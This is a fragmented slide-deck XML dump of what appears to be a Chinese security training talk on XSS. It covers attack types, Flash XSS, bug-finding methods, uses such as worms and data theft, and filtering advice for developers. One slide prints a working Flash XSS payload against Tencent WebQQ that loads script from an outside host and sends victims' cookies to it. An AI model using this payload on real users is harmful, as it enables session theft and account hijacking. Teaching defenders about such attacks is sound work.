            <a:chOff x="2500298" y="2857496"/>
            <a:chExt cx="4456220" cy="1000132"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2500298" y="2857496"/>
              <a:ext cx="4429156" cy="1000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0298" y="3469341"/>
              <a:ext cx="4456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flash.external.ExternalInterface.call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98" y="3183589"/>
              <a:ext cx="425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navigateToURL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>(new </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
                <a:t>URLRequest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298" y="2897837"/>
              <a:ext cx="1883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getURL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");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5008" y="1928802"/>
            <a:ext cx="22835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loaderInfo.parameters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1000108"/>
            <a:ext cx="22472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xxx.swf?func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = JS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0826" y="1000108"/>
            <a:ext cx="24737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flashvars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=JS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5679289" y="1535893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72330" y="164305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6793260" y="2565063"/>
            <a:ext cx="416486" cy="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034" y="5072074"/>
            <a:ext cx="178595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App.baidu.com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4643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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>度应用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00298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4857760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iframe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14678" y="5072074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xxx.duapp.com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43504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66" y="4857760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iframe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00760" y="5072074"/>
            <a:ext cx="300039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App.baidu.com/xxx.swf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94" y="40719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合法的存储行为</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="上弧形箭头 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214546" y="4500570"/>
            <a:ext cx="1143008" cy="428628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4643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14678" y="5715016"/>
            <a:ext cx="178595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developer.com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14744" y="642939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………..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0760" y="585789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黑客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本身是开发者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5214942" y="60007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14942" y="614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-357222" y="4000504"/>
            <a:ext cx="9787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圆角右箭头 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7858148" y="3714752"/>
            <a:ext cx="1500198" cy="642942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153" y="1000108"/>
            <a:ext cx="18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反射</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>型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1250" y="1428736"/>
            <a:ext cx="469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FLASH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开发人员缺乏安全意识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jwplayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, open flash chart, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>swfupload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>类程序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6093" y="207167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FLASH XSS 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绕</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过主流浏览器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS Filter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9738" y="2433071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传统扫描器不易扫描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4282" y="2857496"/>
            <a:ext cx="21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WooYun-2012-07050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4282" y="3143248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Wooyun-2010-07085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282" y="350043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新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>浪微博，淘宝网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盗取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8596" y="5857892"/>
            <a:ext cx="242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Wooyun-2010-08318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85728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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>攻击？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500034" y="390203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107125" y="496491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14282" y="1142984"/>
            <a:ext cx="2031325" cy="2789471"/>
            <a:chOff x="5929322" y="500042"/>
            <a:chExt cx="2031325" cy="2789471"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6000760" y="5000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9322" y="500042"/>
              <a:ext cx="203132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个人资料信息填写</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>发表一篇日志</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>发表一篇留言</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>发表一篇评论</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>提出一个问题</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>回答一个问题</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>…..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29322" y="264318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地址栏参数</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>Dom</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>属性</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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8596" y="592933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攻击者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00100" y="485776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注入恶意代码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500298" y="1571612"/>
            <a:ext cx="4390755" cy="2071702"/>
            <a:chOff x="1357290" y="3214686"/>
            <a:chExt cx="4390755" cy="2071702"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="107" name="组合 106"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1357290" y="3214686"/>
              <a:ext cx="3857652" cy="2071702"/>
              <a:chOff x="714348" y="928670"/>
              <a:chExt cx="3857652" cy="2071702"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="101" name="等腰三角形 100"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="19752380">
                <a:off x="1029631" y="1261494"/>
                <a:ext cx="642942" cy="57150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57356" y="1142984"/>
                <a:ext cx="1714512" cy="9286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输入过滤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输出过滤</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/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 rot="19752380">
                <a:off x="3458523" y="1267274"/>
                <a:ext cx="642942" cy="57150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00100" y="24288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</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" alt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714744" y="250030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输出</a:t>
                </a:r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14348" y="928670"/>
                <a:ext cx="3857652" cy="2071702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86380" y="3714752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26" name="乘号 125"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2571736" y="4572008"/>
              <a:ext cx="500066" cy="500066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00364" y="46703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代码缺陷</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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00892" y="1142984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查看他人资料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看一篇日志</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看一条留言</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看一个评论</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看一个问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看一个答案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点开一个链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>点开一个邮件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7144562" y="492840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00760" y="485776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恶意代码执行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09613" y="592933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受害者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3857628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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" spc="300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>模型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rot="10800000">
            <a:off x="2857488" y="507207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1643042" y="6143644"/>
            <a:ext cx="5500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43108" y="535782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当受害者变为攻击者时，下一轮受害者将更容易被攻击，威力更加明显！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214406" y="1000108"/>
            <a:ext cx="1214438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受害者</a:t>
            </a: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2428844" y="1285858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6156" y="1071545"/>
            <a:ext cx="380523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http://xsst.sinaapp.com/webqqbg.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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714969" y="1857358"/>
            <a:ext cx="125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Iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="肘形连接符 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4929950" y="1999439"/>
            <a:ext cx="8572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86094" y="2500295"/>
            <a:ext cx="4786312" cy="147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http://web.qq.com/swf/FileUploader.swf?callback=(function(){function j(w){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>window.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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('script');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>window.s.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='//xsst.sinaapp.com/'%2bw%2b'.js';document.body.appendChild(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>window.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)}j('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>');j('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>')})()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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77169" y="3000358"/>
            <a:ext cx="995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Flash xss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5072825" y="449975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7656" y="5059345"/>
            <a:ext cx="2360613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xsst.sinaapp.com/wq.js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143344" y="5643545"/>
            <a:ext cx="428625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094" y="6286483"/>
            <a:ext cx="5718175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http://xsst.sinaapp.com/getvfqq.php?cookie={Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据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V="1">
            <a:off x="2250250" y="5679264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844" y="5072045"/>
            <a:ext cx="4024312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http://s.web2.qq.com/api/get_self_info2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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214281" y="5714983"/>
            <a:ext cx="192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获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vfwebqq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>参数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16200000" flipV="1">
            <a:off x="892938" y="4464826"/>
            <a:ext cx="571500" cy="71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3071795"/>
            <a:ext cx="2714625" cy="923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http://cgi.web2.qq.com/keycgi/qqweb/newuac/set.do</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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1428719" y="428623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设置主题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5929281" y="435767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调用外部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JS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286344" y="5714983"/>
            <a:ext cx="1347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获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookies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607187" y="2250264"/>
            <a:ext cx="1000125" cy="357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1285844" y="228598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劫持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8690" y="42860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腾讯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEBQQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的持久</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>劫持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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836461" y="13071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Wooyun-2010-07999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3512413" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="351241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3155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的挖掘方法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1214422"/>
            <a:ext cx="671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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拿着各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS Vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>填入到输入处，然后看页面是否有“执行”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62118"/>
            <a:ext cx="3257550" cy="666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812" y="1762118"/>
            <a:ext cx="2078080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右箭头 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4197160" y="1936091"/>
            <a:ext cx="357190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1472" y="2714620"/>
            <a:ext cx="6688750" cy="396226"/>
            <a:chOff x="571472" y="2714620"/>
            <a:chExt cx="6688750" cy="396226"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="571472" y="271462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2. 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5215" y="2741514"/>
              <a:ext cx="6345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输入一些可能没有被过滤的字符，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>"'\/&amp;&lt;&gt;XXXXX</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>，看“侧漏”</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US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5555"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674007" y="3286124"/>
            <a:ext cx="2428892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r="8492"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4286248" y="3286124"/>
            <a:ext cx="2714644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3571868" y="350043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441699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看功能异常，看报错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4929198"/>
            <a:ext cx="2374831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5317" y="4929198"/>
            <a:ext cx="2695575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3428992" y="51435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7215206" y="1928802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8148" y="1643050"/>
            <a:ext cx="85725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构造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利用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7215206" y="3571876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58148" y="3429000"/>
            <a:ext cx="85725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查明缺陷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7215206" y="5143512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58148" y="5000636"/>
            <a:ext cx="85725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检查原因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8072462" y="4286256"/>
            <a:ext cx="357190" cy="42862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0800000">
            <a:off x="8099356" y="2786058"/>
            <a:ext cx="357190" cy="428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3512413" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="351241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3155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的挖掘方法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857232"/>
            <a:ext cx="3223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传统输入点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各种表单，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>input[text], </a:t>
            </a:r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隐藏输入点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Input[hidden]</a:t>
            </a:r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客户端脚本过滤</a:t>
            </a:r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143372" y="928670"/>
            <a:ext cx="357190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4" y="857232"/>
            <a:ext cx="13388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进一步测试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879366">
            <a:off x="3043404" y="2090830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3306" y="214311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浏览器调试工具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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F12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64871" y="2531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抓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>包工具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 rot="18101422">
            <a:off x="5306223" y="1543277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68" y="3286124"/>
            <a:ext cx="3448050" cy="136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直接箭头连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286380" y="271462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 rot="19419250">
            <a:off x="3030601" y="298069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14744" y="2928934"/>
            <a:ext cx="1164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Httpwatch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Fiddler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Charles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214950"/>
            <a:ext cx="3238500" cy="1123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直接箭头连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3751257" y="446405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034" y="350043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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>遭遇验证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2500298" y="378619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500570"/>
            <a:ext cx="2809875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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6715140" y="2000240"/>
            <a:ext cx="164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看到一些提交的隐藏参数。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rot="10800000">
            <a:off x="6143636" y="232894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2896860" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="289686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2539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的利用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71802" y="1071546"/>
            <a:ext cx="21300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找到一个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点之后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29058" y="1714488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8" y="1031205"/>
            <a:ext cx="245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alert(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/);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1802" y="2285992"/>
            <a:ext cx="2071702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输入点长度限制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突破长度限制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929058" y="2857496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1802" y="3357562"/>
            <a:ext cx="2071702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漏洞的利用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4772875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http-only cookies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71604" y="4429132"/>
            <a:ext cx="1500198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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>蠕虫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57554" y="4429132"/>
            <a:ext cx="1500198" cy="15001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盗取信息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14942" y="4429132"/>
            <a:ext cx="1500198" cy="15001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恶意请求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929058" y="3929066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00892" y="5202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跨域请求问题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0892" y="563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代码编写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2868" y="4390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熟悉产品架构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77202" y="33575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恶意代码的隐蔽性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285728"/>
            <a:ext cx="1157409" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="1157409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857224" y="2857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总结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8596" y="4643446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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>开发人员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，要有一定的安全意识，当编写一段代码的时候，要站在攻方的角度，来思考程序的安全性。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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全人员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，要站在开发人员的角度来思考，推测开发人员的逻辑，寻找缺陷，并加以利用。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071546"/>
            <a:ext cx="3857652" cy="2857500"/>
            <a:chOff x="2714612" y="1071546"/>
            <a:chExt cx="3857652" cy="2857500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="左右箭头 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4286248" y="1714488"/>
              <a:ext cx="2286016" cy="1500198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右箭头 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2714612" y="1785926"/>
              <a:ext cx="2286016" cy="1500198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746" name="Picture 2" descr="http://eeeeee.org/svg/tj/now_tj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4678" y="1071546"/>
              <a:ext cx="2857500" cy="2857500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1142976" y="2357430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开发人员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228599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安全人员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000504"/>
            <a:ext cx="27238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一切输入都不能忘了过滤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500166" y="3071810"/>
            <a:ext cx="428628" cy="6429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15074" y="4000504"/>
            <a:ext cx="24929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一切输入都可能被利用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358082" y="3071810"/>
            <a:ext cx="428628" cy="6429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214810" y="285728"/>
            <a:ext cx="1000132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6" y="10715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正确构造利用代码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1142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正确过滤恶意代码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43900" y="35718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EXIF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3993" y="3273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28" name="燕尾形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2373928">
            <a:off x="6040868" y="1021079"/>
            <a:ext cx="642942" cy="35719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19226072" flipH="1">
            <a:off x="2897596" y="1021079"/>
            <a:ext cx="642942" cy="357190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7" y="1953768"/>
            <a:ext cx="8429684" cy="29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6600" dirty="0" smtClean="0"/>
              <a:t>谢谢大家        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0"/>
              <a:t>" alt="This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is the end!"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6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220480"/>
            <a:ext cx="134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4786314" y="321468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0800000">
            <a:off x="392905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2500306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用户信息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私密信息：日志，相片，邮件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4612" y="3500438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管理信息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392906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后台地址，管理员帐号信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>甚至直接通过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4286256"/>
            <a:ext cx="13388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客户端信息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3372" y="48577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针对浏览器缺陷实施攻击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4000496" y="3286124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4286248" y="364331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4035421" y="2678901"/>
            <a:ext cx="121524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571612"/>
            <a:ext cx="2262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突破浏览器的域限制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7290" y="20595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360, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>傲游等浏览器的命令执行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572000" y="2500306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071934" y="2571744"/>
            <a:ext cx="1143008" cy="1143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0694" y="2285992"/>
            <a:ext cx="14077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Xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>蠕虫攻击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2132" y="3643314"/>
            <a:ext cx="115929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7224" y="285728"/>
            <a:ext cx="370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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>攻击可以用来做什么？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500034" y="390203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28596" y="1071547"/>
            <a:ext cx="8429684" cy="5429288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="75000">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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0034" y="285728"/>
            <a:ext cx="2520154" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="2520154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857224" y="285728"/>
              <a:ext cx="216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的种类划分</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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4726" y="2643183"/>
            <a:ext cx="1449820" cy="928693"/>
            <a:chOff x="979040" y="1928802"/>
            <a:chExt cx="1449820" cy="928693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1928802"/>
              <a:ext cx="120674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反射型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9040" y="2488163"/>
              <a:ext cx="1449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Reflected XSS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482" y="4702743"/>
            <a:ext cx="1220188" cy="869398"/>
            <a:chOff x="1079243" y="3643314"/>
            <a:chExt cx="1220188" cy="869398"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1079243" y="3643314"/>
              <a:ext cx="120674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存储型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581" y="4143380"/>
              <a:ext cx="118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Stored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2231" y="150017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恶意代码存放位置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3643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地址栏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51961" y="5917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pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="http://www.iconpng.com/png/webcons/clock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357299"/>
            <a:ext cx="571504" cy="5715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357950" y="148803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恶意代码效果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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28596" y="2214555"/>
            <a:ext cx="8429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8596" y="4357695"/>
            <a:ext cx="8429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2821769" y="3750472"/>
            <a:ext cx="535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-321503" y="3750472"/>
            <a:ext cx="535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9" descr="http://files.jb51.net/scimg/web/20101025/Hat-bow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285861"/>
            <a:ext cx="785818" cy="78581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857884" y="357187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用户点击恶意链接打开时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执行恶意代码，隐蔽性差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29322" y="2786059"/>
            <a:ext cx="247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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.wooyun.org</a:t>
            </a:r>
          </a:p>
          <a:p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6500826" y="2643183"/>
            <a:ext cx="785818" cy="785818"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D5F4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3226" y="2795583"/>
            <a:ext cx="490542" cy="49054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7979835">
            <a:off x="6743523" y="2679177"/>
            <a:ext cx="642942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549481" y="5786455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用户浏览带有恶意代码的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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>正常页面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时触发，隐蔽性强</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
